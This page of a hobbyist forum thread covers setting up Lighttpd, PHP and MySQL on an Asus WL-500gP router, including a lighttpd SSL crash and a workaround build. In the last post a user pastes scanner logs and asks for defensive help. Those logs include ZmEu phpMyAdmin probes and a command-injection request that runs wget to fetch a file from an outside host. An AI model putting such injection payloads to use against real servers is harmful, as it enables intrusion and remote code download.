Page 9 of 11 FirstFirst ... 7891011 LastLast
Results 121 to 135 of 153

Thread: How-to Lighttpd, PHP, MySQL and Eaccelerator

  1. #121
    as it's not in the repository, you'll need to compile it on your own and give it a try

    good luck
    RT-N66U TomatoUSB 1.28.0000 MIPSR2-135 K26AC USB AIO-64K running Entware-NG
    pyload 0.4.9
    minidlna 1.1.2
    samba 3.6.5
    openvpn 2.3.10
    ̶W̶L̶5̶0̶0̶g̶P̶ ̶1̶.̶9̶.̶2̶.̶7̶-̶r̶t̶n̶-̶r̶4̶7̶5̶0 retired

  2. #122
    Join Date
    Dec 2007
    Location
    The Netherlands - Eindhoven
    Posts
    1,767
    Quote Originally Posted by matthewcheck View Post
    Hi,

    first of all, great tutorial, easy to follow and set-up, everything working fine.

    I just want to ask if there is a way to run php 5.3 on wl500gp. Is there a guide to do this? I am not very skilled in unix systems
    Additionaly, is it yet possible to run mysql 5 on this box?

    I need this environment as the tool I am trying to install has these requirements.

    Thanks
    Thanks, glad it works

    mysql5 is available in ipkg, it was not working 100% properly with php when I tried it however. The database itself works, but the mysql modules for php are not working. I think you have to recompile those to work with the new mysql.

    you should be able to install it with ipkg install mysql5
    I remember a russian thread about this as well, I'm not sure if they made it working however

    for php, you have to recompile it yourself. to compile php is not really an issue, but you might run into dependency issues.

    So if possible, I recommend to find something that does work with mysql4

  3. #123
    Quote Originally Posted by wpte View Post
    Thanks, glad it works

    mysql5 is available in ipkg, it was not working 100% properly with php when I tried it however. The database itself works, but the mysql modules for php are not working. I think you have to recompile those to work with the new mysql.

    you should be able to install it with ipkg install mysql5
    I remember a russian thread about this as well, I'm not sure if they made it working however

    for php, you have to recompile it yourself. to compile php is not really an issue, but you might run into dependency issues.

    So if possible, I recommend to find something that does work with mysql4
    Thanks for quick replies!

    I'd like to install the Bug Genie tool: http://thebuggenie.com/index.php
    As requirements say (http://issues.thebuggenie.com/wiki/TheBugGenie%3AFAQ), php 5.3 is a requirement, so probably I won't be able to do anything about it but to get 5.3.+ version running. As I have noticed, the Bug Genie tool works also with PostgreSQL version 8.2.+, and the one included in the ipkg should confirm to this requirement. So the only problem here is a PHP requirement.

    As I said before, I am not very skilled in UNIX systems (I have never compiled anything yet ) so I am not sure if I will be able to get this working correctly. Therefore I'd really like to find a walkthrough that would guide me through entire process ... Do you know about some tutorial that would help me?

    One more question, is it possible that someone unix-compile-skilled would compile the php 5.3.+ and somehow provide me a copy of it so that I could easily set it up on my machine?

    Thanks in advance for replies and help ...

    matt

  4. #124
    Join Date
    Dec 2007
    Location
    The Netherlands - Eindhoven
    Posts
    1,767
    Well... if they are small programs I'd compile them for you, but php is just too big to spend my spare time on.

    postgresql is v8.2 in ipkg: http://ipkg.nslu2-linux.org/feeds/op...3-2_mipsel.ipk

    I'd say, try it with that and php 5.2
    if it doesn't work, I'm afraid I can't help you much apart from referring you to the part of compiling Eaccelerator. if you've installed those packages you might have a chance it's good enough to compile php with.

    grab the sources of php, and read up on the ./configure parameters and try it out.
    as I said, it's probably going to be a tricky thing to actually do. compiling it with the crosscompiler is also somewhat of a hell last time I tried to do something similar.

  5. #125
    Quote Originally Posted by matthewcheck View Post
    I'd like to install the Bug Genie tool: http://thebuggenie.com/index.php
    As requirements say (http://issues.thebuggenie.com/wiki/TheBugGenie%3AFAQ), php 5.3 is a requirement, so probably I won't be able to do anything about it but to get 5.3.+ version running. As I have noticed, the Bug Genie tool works also with PostgreSQL version 8.2.+, and the one included in the ipkg should confirm to this requirement. So the only problem here is a PHP requirement.
    You may try to install php 5.3.8 with mysql/pgsql modules from my OpenWRT repo. There is also pgsql-server 9.0.1, but IMHO its too heavy for embedded systems.

  6. #126
    Join Date
    Dec 2007
    Location
    The Netherlands - Eindhoven
    Posts
    1,767
    I want to note that lighttpd 1.4.30-1 crashes with a segmentation fault when using ssl
    and is it just me or is that mailinglist not very active?

  7. #127
    Will see if/when OpenWRT package being updated.
    Last edited by ryzhov_al; 23-12-2011 at 06:04. Reason: Spell check

  8. #128
    Join Date
    Dec 2007
    Location
    The Netherlands - Eindhoven
    Posts
    1,767
    Quote Originally Posted by ryzhov_al View Post
    Will see if when OpenWRT package being updated.
    yeah, I've been able to post on the mailinglist...
    twice in fact, since I wasn't aware of the moderation thingy

  9. #129

    Angry

    Quote Originally Posted by wpte View Post
    I want to note that lighttpd 1.4.30-1 crashes with a segmentation fault when using ssl
    and is it just me or is that mailinglist not very active?
    Me too

  10. #130
    Join Date
    Dec 2007
    Location
    The Netherlands - Eindhoven
    Posts
    1,767
    Quote Originally Posted by mexner View Post
    Me too
    I haven't been able to discover what is going wrong... I followed the lighttpd wiki and took note of the changes in the new version: http://www.lighttpd.net/2011/12/18/1...sent-this-year

    in the mean time I've compiled v1.4.29 myself to have ssl working again.

  11. #131

    lighttpd issue lighttpd_1.4.30-1_mipsel.ipk

    I've upgraded to lighttpd_1.4.30-1_mipsel.ipk and now each time a client connects to the server, the lighttpd process dies.

    Anyone else faces this problem?

  12. #132
    Quote Originally Posted by wpte View Post
    I want to note that lighttpd 1.4.30-1 crashes with a segmentation fault when using ssl
    and is it just me or is that mailinglist not very active?
    Same problem with me!
    After upgrade to 1.4.30-1 the process dies on first client connect.

    Could someone post a link to a previous version?

  13. #133
    Join Date
    Dec 2007
    Location
    The Netherlands - Eindhoven
    Posts
    1,767
    Quote Originally Posted by ros View Post
    Same problem with me!
    After upgrade to 1.4.30-1 the process dies on first client connect.

    Could someone post a link to a previous version?
    for 1.4.30 disabling the ssl engine should work.

    it's not the official one, I had to compile it myself, and everything works again (as far as I'm aware).
    mind that these are binaries only. By simply overwriting the 1.4.30 ones should work.

    Code:
    /opt/etc/init.d/S80lighttpd stop
    cd /opt
    wget http://wpte.kicks-ass.net/downloads/Oleg%20Firmware/Compiled%20software%20native/lighttpd-1.4.29.tar.bz2
    tar -jxvf lighttpd-1.4.29.tar.bz2
    rm lighttpd-1.4.29.tar.bz2
    /opt/etc/init.d/S80lighttpd start

  14. #134
    thank you. will try it.

  15. #135

    Angry breaking in attemps?

    Hello to all in this forum. And thank you for your good work so I have been able to put up a webserver. But obviously I did register, because I have a question. And here it comes:

    I have been getting these attemps to my IP
    Code:
    210.34.10.68 - - [15/Dec/2011:03:00:41 +0200] "HEAD / HTTP/1.0" 302 0 "-" "-"
    188.165.247.215 - - [15/Dec/2011:07:06:40 +0200] "HEAD / HTTP/1.0" 302 0 "-" "-"
    67.228.187.116 - - [15/Dec/2011:09:06:21 +0200] "HEAD / HTTP/1.0" 302 0 "-" "-"
    What are these?

    And these are somekind of hacking attemps, right?
    Code:
    125.88.75.199 **.**.***.*** - [15/Dec/2011:18:11:49 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 345 "-" "ZmEu"
    125.88.75.199 **.**.***.*** - [15/Dec/2011:18:11:49 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 345 "-" "ZmEu"
    125.88.75.199 **.**.***.*** - [15/Dec/2011:18:11:55 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 345 "-" "ZmEu"
    
    193.85.145.195 **.**.***.*** - [17/Dec/2011:13:37:54 +0200] "GET /cse/pmwiki.php HTTP/1.1" 200 418 "-" "-"
    193.85.145.195 **.**.***.*** - [17/Dec/2011:13:37:54 +0200] "GET /info/pmwiki.php HTTP/1.1" 200 419 "-" "-"
    193.85.145.195 **.**.***.*** - [17/Dec/2011:13:37:54 +0200] "GET /infowiki/pmwiki.php HTTP/1.1" 200 423 "-" "-"
    
    188.138.11.56 **.**.***.*** - [25/Dec/2011:02:22:35 +0200] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/cgi-bin.txt%20http://freetunel.com/cgi-bin.txt HTTP/1.1" 200 586 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
    188.138.11.56 **.**.***.*** - [25/Dec/2011:02:22:36 +0200] "GET //webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/cgi-bin.txt%20http://freetunel.com/cgi-bin.txt HTTP/1.1" 200 583 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
    188.138.11.56 **.**.***.*** - [25/Dec/2011:02:22:36 +0200] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20http://freetunel.com/cgi-bin.txt HTTP/1.1" 200 547 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
    How dangerous are these? Can I block them somehow?

    And what the f**k is this?
    Code:
    61.250.80.133 **.**.***.*** - [21/Dec/2011:23:56:42 +0200] "GET /user/soapCaller.bs HTTP/1.1" 200 445 "-" "Morfeus Fucking Scanner"
    I made my site SSL, thanks to wpte for instructions in this thread, blocked port 80 and after that I have get only couple attemps:
    Code:
    113.142.1.249 **.**.***.*** - [06/Jan/2012:11:01:34 +0200] "GET /admin/config.php HTTP/1.1" 200 436 "-" "Python-urllib/2.4"
    94.24.41.200 **.**.***.*** - [08/Jan/2012:13:11:16 +0200] "GET /admin/cdr/counter.txt HTTP/1.1" 200 422 "-" "-"
    Are these two same category than those above?

    I want to open port 80 again, because google translate dosn't work on https. Can I forward from another port somehow? Earlier tried port 8081 and my PHP Fusion site didn't work (cookies?). So I'm asking is there something I can do those attemps?
    Last edited by jeremees; 09-01-2012 at 21:20.

Page 9 of 11 FirstFirst ... 7891011 LastLast

Similar Threads

  1. Full server config: Samba ftp http xmail mysql forum motor
    By KisVuK in forum WL-500gP Tutorials
    Replies: 14
    Last Post: 15-12-2008, 22:34

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •